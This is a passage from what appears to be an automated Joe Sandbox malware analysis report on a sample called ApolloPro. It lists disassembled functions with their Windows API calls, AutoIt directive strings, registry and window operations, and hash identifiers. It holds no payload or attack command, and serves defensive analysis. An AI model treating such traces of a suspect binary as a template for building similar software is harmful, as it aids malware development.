                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                              • String ID:
                                                                                              • API String ID: 3761583154-0
                                                                                              • Opcode ID: 8c5cc0506bb404a09c2c4988040008d05ab90b4328b29f9ba437b0ac1097bbe2
                                                                                              • Instruction ID: 03776dbb2364e6dead95deee445e465be96d61583bc4ac0e75925612e2104289
                                                                                              • Opcode Fuzzy Hash: 8c5cc0506bb404a09c2c4988040008d05ab90b4328b29f9ba437b0ac1097bbe2
                                                                                              • Instruction Fuzzy Hash: 1A218635605205EFAB10AFA8DC88DBF77EDEB0D360B008625F919CB2A1D671EC41CB64
                                                                                              Function 0068FE19 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wcsnicmp
                                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                              • API String ID: 1038674560-2734436370
                                                                                              • Opcode ID: 13da8b7adbe0fd17d5d014be860b7f900ed75a17e29ca948bc43ada5d7fb9b64
                                                                                              • Instruction ID: 4b81ffa4215c44f1bacc43782ea6ff208f3c50fda71c5e763df74d2ab5480ae4
                                                                                              • Opcode Fuzzy Hash: 13da8b7adbe0fd17d5d014be860b7f900ed75a17e29ca948bc43ada5d7fb9b64
                                                                                              • Instruction Fuzzy Hash: CC214C3210012276D331BB259C1AFF7739BDF55750F50463DF885872A3EB919D468399
                                                                                              Function 006B7BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00632111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                                • Part of subcall function 00632111: GetStockObject.GDI32(00000011), ref: 00632163
                                                                                                • Part of subcall function 00632111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006B7C57
                                                                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006B7C64
                                                                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006B7C6F
                                                                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006B7C7E
                                                                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006B7C8A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$CreateObjectStockWindow
                                                                                              • String ID: Msctls_Progress32
                                                                                              • API String ID: 1025951953-3636473452
                                                                                              • Opcode ID: 14a9adaaea2f13bb8f5283e41837b2c90d48dc2dbef4edfdfb63f9d2f82dabf5
                                                                                              • Instruction ID: 7d8d1e9a6a6733e41fc43b4a7972915e3153f3c37f3ef27cc2e231d6762d0b03
                                                                                              • Opcode Fuzzy Hash: 14a9adaaea2f13bb8f5283e41837b2c90d48dc2dbef4edfdfb63f9d2f82dabf5
                                                                                              • Instruction Fuzzy Hash: BB11B2B2150219BEEF159F60CC85EE77F5EEF48798F014115BB08A2191C772AC61DBA4
                                                                                              Function 00659D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __init_pointers.LIBCMT ref: 00659D16
                                                                                                • Part of subcall function 006533B7: EncodePointer.KERNEL32(00000000), ref: 006533BA
                                                                                                • Part of subcall function 006533B7: __initp_misc_winsig.LIBCMT ref: 006533D5
                                                                                                • Part of subcall function 006533B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0065A0D0
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0065A0E4
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0065A0F7
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0065A10A
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0065A11D
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0065A130
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0065A143
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0065A156
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0065A169
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0065A17C
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0065A18F
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0065A1A2
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0065A1B5
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0065A1C8
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0065A1DB
                                                                                                • Part of subcall function 006533B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0065A1EE
                                                                                              • __mtinitlocks.LIBCMT ref: 00659D1B
                                                                                              • __mtterm.LIBCMT ref: 00659D24
                                                                                                • Part of subcall function 00659D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00659D29,00657EFD,006ECD38,00000014), ref: 00659E86
                                                                                                • Part of subcall function 00659D8C: _free.LIBCMT ref: 00659E8D
                                                                                                • Part of subcall function 00659D8C: DeleteCriticalSection.KERNEL32(0Ro,?,?,00659D29,00657EFD,006ECD38,00000014), ref: 00659EAF
                                                                                              • __calloc_crt.LIBCMT ref: 00659D49
                                                                                              • __initptd.LIBCMT ref: 00659D6B
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00659D72
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                              • String ID:
                                                                                              • API String ID: 3567560977-0
                                                                                              • Opcode ID: 35a21e40a2b81de9758b837175022873cd86c43d5bc943926d2082e89295e3d8
                                                                                              • Instruction ID: cd1a4171f05b873c2d994a9ce70b42fd6b11ebcefebd622c117b409fdd7ce967
                                                                                              • Opcode Fuzzy Hash: 35a21e40a2b81de9758b837175022873cd86c43d5bc943926d2082e89295e3d8
                                                                                              • Instruction Fuzzy Hash: E4F06232515B11D9E7B87774BC0369A26A7DF41776F11571DFC50D51D3EF1084094178
                                                                                              Function 006541B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00654282,?), ref: 006541D3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 006541DA
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 006541E6
                                                                                              • DecodePointer.KERNEL32(00000001,00654282,?), ref: 00654203
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoInitialize$combase.dll
                                                                                              • API String ID: 3489934621-340411864
                                                                                              • Opcode ID: 7bad9b22bb23b64af09c1113abc8691d7f7bedd0ebb81658f7d25280c452f096
                                                                                              • Instruction ID: 65e0bf24950ac35974d7cf2741a0f7909c3c8363aca7ec718ebdb627c7aeeaee
                                                                                              • Opcode Fuzzy Hash: 7bad9b22bb23b64af09c1113abc8691d7f7bedd0ebb81658f7d25280c452f096
                                                                                              • Instruction Fuzzy Hash: 5DE01270550751EFEB105B70DD4DF743557BB1470AF606414B902D52A0CBB56585CF00
                                                                                              Function 0065428E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,006541A8), ref: 006542A8
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 006542AF
                                                                                              • EncodePointer.KERNEL32(00000000), ref: 006542BA
                                                                                              • DecodePointer.KERNEL32(006541A8), ref: 006542D5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                              • String ID: RoUninitialize$combase.dll
                                                                                              • API String ID: 3489934621-2819208100
                                                                                              • Opcode ID: 76c1de566a3bf4a369e449ca71710f9b0d75fba35bf6588c06d0cef7e2d924c4
                                                                                              • Instruction ID: 7491bf4a76aa4ccb4b4116d68b55cb6af0650286f2ca3e2aff38f1a6ec8aaee3
                                                                                              • Opcode Fuzzy Hash: 76c1de566a3bf4a369e449ca71710f9b0d75fba35bf6588c06d0cef7e2d924c4
                                                                                              • Instruction Fuzzy Hash: 5FE0B670550B11EFEB109B60ED0DFB43A67BB04B06F506118F602D5AA0CBB4BA58CA10
                                                                                              Function 0063218F Relevance: 9.3, APIs: 6, Instructions: 254COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetClientRect.USER32(?,?), ref: 006321B8
                                                                                              • GetWindowRect.USER32(?,?), ref: 006321F9
                                                                                              • ScreenToClient.USER32(?,?), ref: 00632221
                                                                                              • GetClientRect.USER32(?,?), ref: 00632350
                                                                                              • GetWindowRect.USER32(?,?), ref: 00632369
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                              • String ID:
                                                                                              • API String ID: 1296646539-0
                                                                                              • Opcode ID: 0f4a91fcb331a2798e3eb198a7920e909f8d1fb37f5f7a94d38703b73a04773f
                                                                                              • Instruction ID: 32ecff2791e928298f2adc56b491f7774e13d99d12835b4ced06c9dcc9cb50d5
                                                                                              • Opcode Fuzzy Hash: 0f4a91fcb331a2798e3eb198a7920e909f8d1fb37f5f7a94d38703b73a04773f
                                                                                              • Instruction Fuzzy Hash: 1EB14C3990024ADBDF10CFA8C9907EEB7B2FF08710F149129ED59EB254DB35AA51CB94
                                                                                              Function 00696A73 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove$__itow__swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3253778849-0
                                                                                              • Opcode ID: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
                                                                                              • Instruction ID: 62f87f5ef40201828884feb06e5161927dc4f4b08a2201901b938d7f6ea1bf95
                                                                                              • Opcode Fuzzy Hash: d7c6c313eaf90a61c7f706f7d30033c8ef0e257baeb317b4a95423308137ce43
                                                                                              • Instruction Fuzzy Hash: 3E61AE3050025AABCF51EF60CC81FFE77AAAF06308F04455DF8555B692DB35AD45CB98
                                                                                              Function 006B0844 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                                • Part of subcall function 006B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,006B040D,?,?), ref: 006B1491
                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 006B091D
                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 006B095D
                                                                                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 006B0980
                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 006B09A9
                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 006B09EC
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 006B09F9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 4046560759-0
                                                                                              • Opcode ID: 3569bfb620ca0159aded0348502a49a1a0b3408404428da2491ba3b737b847ca
                                                                                              • Instruction ID: 1e96fad24f531da6484d4d8a09cb893c908cd33d7f0162fc4a87d7a4f466996e
                                                                                              • Opcode Fuzzy Hash: 3569bfb620ca0159aded0348502a49a1a0b3408404428da2491ba3b737b847ca
                                                                                              • Instruction Fuzzy Hash: 55517A71208200AFE750EF64C895EAFBBEAFF85314F04491DF5958B2A2DB31E945CB52
                                                                                              Function 006B5DD6 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetMenu.USER32(?), ref: 006B5E38
                                                                                              • GetMenuItemCount.USER32(00000000), ref: 006B5E6F
                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 006B5E97
                                                                                              • GetMenuItemID.USER32(?,?), ref: 006B5F06
                                                                                              • GetSubMenu.USER32(?,?), ref: 006B5F14
                                                                                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 006B5F65
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountMessagePostString
                                                                                              • String ID:
                                                                                              • API String ID: 650687236-0
                                                                                              • Opcode ID: 2878ee91e3ff625b7f8addf718f9767f4e59d506bd62cc75db92ce7532dde3b6
                                                                                              • Instruction ID: 5717f7e11d320f709c9c607648025169234c7626963b1ac97a7ccc90f74872d3
                                                                                              • Opcode Fuzzy Hash: 2878ee91e3ff625b7f8addf718f9767f4e59d506bd62cc75db92ce7532dde3b6
                                                                                              • Instruction Fuzzy Hash: 69517A75A01615EFDB51EF64C845AEEB7BAEF48310F104059E902BB391CB70AE828F95
                                                                                              Function 0068F688 Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0068F6A2
                                                                                              • VariantClear.OLEAUT32(00000013), ref: 0068F714
                                                                                              • VariantClear.OLEAUT32(00000000), ref: 0068F76F
                                                                                              • _memmove.LIBCMT ref: 0068F799
                                                                                              • VariantClear.OLEAUT32(?), ref: 0068F7E6
                                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0068F814
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 1101466143-0
                                                                                              • Opcode ID: 3beda1fd1b4b51012f0cd48d781061b7d43cf202de42b51ff2a8c6103518fef5
                                                                                              • Instruction ID: 34964dec9c7f7e79eaf9fd8b9e77a6bd30c8548ea3d022a767fbdf23bda4f23c
                                                                                              • Opcode Fuzzy Hash: 3beda1fd1b4b51012f0cd48d781061b7d43cf202de42b51ff2a8c6103518fef5
                                                                                              • Instruction Fuzzy Hash: 2B5148B5A00209EFDB14DF58D884AAAB7F9FF4C354F15856AE959DB300D730E911CBA0
                                                                                              Function 006929B1 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006929FF
                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00692A4A
                                                                                              • IsMenu.USER32(00000000), ref: 00692A6A
                                                                                              • CreatePopupMenu.USER32 ref: 00692A9E
                                                                                              • GetMenuItemCount.USER32(000000FF), ref: 00692AFC
                                                                                              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00692B2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3311875123-0
                                                                                              • Opcode ID: 863fcc4b2d63f7c4785b4cb1243a7b2b0a236db3131ecab65f91de1d5df2bceb
                                                                                              • Instruction ID: de3e3ea3dd6b0b43021233c5273581d7ae91a6678220b6e65b18322c13438f51
                                                                                              • Opcode Fuzzy Hash: 863fcc4b2d63f7c4785b4cb1243a7b2b0a236db3131ecab65f91de1d5df2bceb
                                                                                              • Instruction Fuzzy Hash: C951CD70A0030BEFDF25CF68D8A8BEEBBFAAF14318F104119E8119B6A5D7709945CB51
                                                                                              Function 00631B41 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 006329E2: GetWindowLongW.USER32(?,000000EB), ref: 006329F3
                                                                                              • BeginPaint.USER32(?,?,?,?,?,?), ref: 00631B76
                                                                                              • GetWindowRect.USER32(?,?), ref: 00631BDA
                                                                                              • ScreenToClient.USER32(?,?), ref: 00631BF7
                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00631C08
                                                                                              • EndPaint.USER32(?,?), ref: 00631C52
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                              • String ID:
                                                                                              • API String ID: 1827037458-0
                                                                                              • Opcode ID: 673e3915bbbf321aaee35a0a8ed66ab5f6f77bb9fdf91c95079b5b202c3dd1c5
                                                                                              • Instruction ID: c6c56ecd43286dd21a8862fde8d432d940f12307d83d0ec1abd640e8fb7d1dc2
                                                                                              • Opcode Fuzzy Hash: 673e3915bbbf321aaee35a0a8ed66ab5f6f77bb9fdf91c95079b5b202c3dd1c5
                                                                                              • Instruction Fuzzy Hash: 3941AF30104300EFD711DF24CC88FBA7BEAEB5A360F141669F9A5CB2A1C7309945DBA1
                                                                                              Function 006BBD10 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ShowWindow.USER32(006F77B0,00000000,00DD52C0,?,?,006F77B0,?,006BBC1A,?,?), ref: 006BBD84
                                                                                              • EnableWindow.USER32(?,00000000), ref: 006BBDA8
                                                                                              • ShowWindow.USER32(006F77B0,00000000,00DD52C0,?,?,006F77B0,?,006BBC1A,?,?), ref: 006BBE08
                                                                                              • ShowWindow.USER32(?,00000004,?,006BBC1A,?,?), ref: 006BBE1A
                                                                                              • EnableWindow.USER32(?,00000001), ref: 006BBE3E
                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 006BBE61
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmpDownload File
